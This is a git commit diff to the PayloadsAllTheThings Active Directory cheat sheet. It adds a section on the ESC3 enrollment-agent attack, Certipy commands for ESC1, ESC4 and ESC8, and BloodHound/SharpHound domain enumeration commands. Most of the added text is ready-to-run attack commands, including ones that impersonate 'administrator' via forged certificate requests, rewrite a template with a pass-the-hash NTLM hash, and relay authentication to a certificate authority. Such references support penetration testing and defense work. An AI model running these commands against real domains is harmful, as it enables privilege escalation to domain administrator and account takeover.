mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
ESC3 - Misconfigured Enrollment Agent Templates + Certipy v2
This commit is contained in:
parent
71dcfd5ca7
commit
3e3562e553
@ -75,9 +75,10 @@
|
||||
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
||||
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
||||
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
||||
- [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates)
|
||||
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
|
||||
* [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
||||
* [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||
- [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
||||
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||
@ -210,41 +211,43 @@ Use the correct collector
|
||||
* AzureHound for Azure Active Directory
|
||||
* SharpHound for local Active Directory
|
||||
|
||||
use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
|
||||
* use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
|
||||
```powershell
|
||||
# require: Install-Module -name Az -AllowClobber
|
||||
# require: Install-Module -name AzureADPreview -AllowClobber
|
||||
Connect-AzureAD
|
||||
Connect-AzAccount
|
||||
. .\AzureHound.ps1
|
||||
Invoke-AzureHound
|
||||
```
|
||||
|
||||
```powershell
|
||||
# require: Install-Module -name Az -AllowClobber
|
||||
# require: Install-Module -name AzureADPreview -AllowClobber
|
||||
Connect-AzureAD
|
||||
Connect-AzAccount
|
||||
. .\AzureHound.ps1
|
||||
Invoke-AzureHound
|
||||
```
|
||||
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||
```powershell
|
||||
# run the collector on the machine using SharpHound.exe
|
||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
||||
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
|
||||
.\SharpHound.exe -c all -d active.htb -SearchForest
|
||||
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
|
||||
.\SharpHound.exe -c all,GPOLocalGroup
|
||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
||||
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
|
||||
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
||||
|
||||
use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||
# or run the collector on the machine using Powershell
|
||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
|
||||
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
|
||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||
Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
|
||||
|
||||
```powershell
|
||||
# run the collector on the machine using SharpHound.exe
|
||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
||||
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
|
||||
.\SharpHound.exe -c all -d active.htb -SearchForest
|
||||
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
|
||||
.\SharpHound.exe -c all,GPOLocalGroup
|
||||
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
|
||||
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
|
||||
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
|
||||
|
||||
# or run the collector on the machine using Powershell
|
||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
|
||||
# /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1
|
||||
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
|
||||
Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Password> -OutputDirectory <PathToFile>
|
||||
|
||||
# or remotely via BloodHound Python
|
||||
# https://github.com/fox-it/BloodHound.py
|
||||
pip install bloodhound
|
||||
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
||||
```
|
||||
# or remotely via BloodHound Python
|
||||
# https://github.com/fox-it/BloodHound.py
|
||||
pip install bloodhound
|
||||
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
||||
```
|
||||
* Collect more data for certificates exploitation using Certipy
|
||||
```ps1
|
||||
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
|
||||
```
|
||||
|
||||
Then import the zip/json files into the Neo4J database and query them.
|
||||
|
||||
@ -264,6 +267,7 @@ You can add some custom queries like :
|
||||
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
||||
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
||||
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
|
||||
* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json)
|
||||
|
||||
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
||||
|
||||
@ -2213,11 +2217,12 @@ Exploitation:
|
||||
or
|
||||
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
||||
```
|
||||
* Use Certify or [Certi](https://github.com/eloypgz/certi) to request a Certificate and add an alternative name (user to impersonate)
|
||||
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
||||
```ps1
|
||||
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
|
||||
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
|
||||
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
|
||||
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
|
||||
```
|
||||
* Use OpenSSL and convert the certificate, do not enter a password
|
||||
```ps1
|
||||
@ -2246,6 +2251,21 @@ Exploitation:
|
||||
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
||||
|
||||
|
||||
#### ESC3 - Misconfigured Enrollment Agent Templates
|
||||
|
||||
> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
|
||||
|
||||
* Request a certificate based on the vulnerable certificate template ESC3.
|
||||
```ps1
|
||||
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
|
||||
[*] Saved certificate and private key to 'john.pfx'
|
||||
```
|
||||
* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
|
||||
```ps1
|
||||
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
|
||||
```
|
||||
|
||||
|
||||
#### ESC4 - Access Control Vulnerabilities
|
||||
|
||||
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
|
||||
@ -2266,6 +2286,17 @@ Exploitation:
|
||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
|
||||
```
|
||||
|
||||
Using Certipy
|
||||
|
||||
```ps1
|
||||
# overwrite the configuration to make it vulnerable to ESC1
|
||||
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
|
||||
# request a certificate based on the ESC4 template, just like ESC1.
|
||||
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local'
|
||||
# restore the old configuration
|
||||
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
|
||||
```
|
||||
|
||||
#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
|
||||
|
||||
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
|
||||
@ -2287,7 +2318,7 @@ Mitigation:
|
||||
#### ESC7 - Vulnerable Certificate Authority Access Control
|
||||
|
||||
Exploitation:
|
||||
* Detect CAs that allow low privileged users the ManageCA permission
|
||||
* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions
|
||||
```ps1
|
||||
Certify.exe find /vulnerable
|
||||
```
|
||||
@ -2387,6 +2418,10 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
||||
output - Output path to store base64 generated crt.
|
||||
```
|
||||
* Version 4: Certipy ESC8
|
||||
```ps1
|
||||
certipy relay -ca 172.16.19.100
|
||||
```
|
||||
|
||||
### Dangerous Built-in Groups Usage
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user